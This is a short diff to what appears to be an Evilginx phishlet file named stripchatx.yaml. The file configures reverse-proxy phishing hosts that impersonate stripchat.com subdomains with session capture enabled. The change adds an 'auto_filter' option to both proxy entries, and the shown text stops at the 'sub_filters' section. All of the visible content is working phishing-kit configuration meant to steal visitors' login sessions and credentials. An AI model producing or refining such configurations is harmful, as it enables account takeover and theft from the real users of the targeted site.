--- a/stripchatx.yaml
+++ b/stripchatx.yaml
@@ -1,9 +1,9 @@
 author: '@cwaizydee'
 min_ver: '2.3.0'
 proxy_hosts:
-  - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true}
+  - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true, auto_filter: true}
  
-  - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: false}
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: false, auto_filter: true}
   
 
 sub_filters:
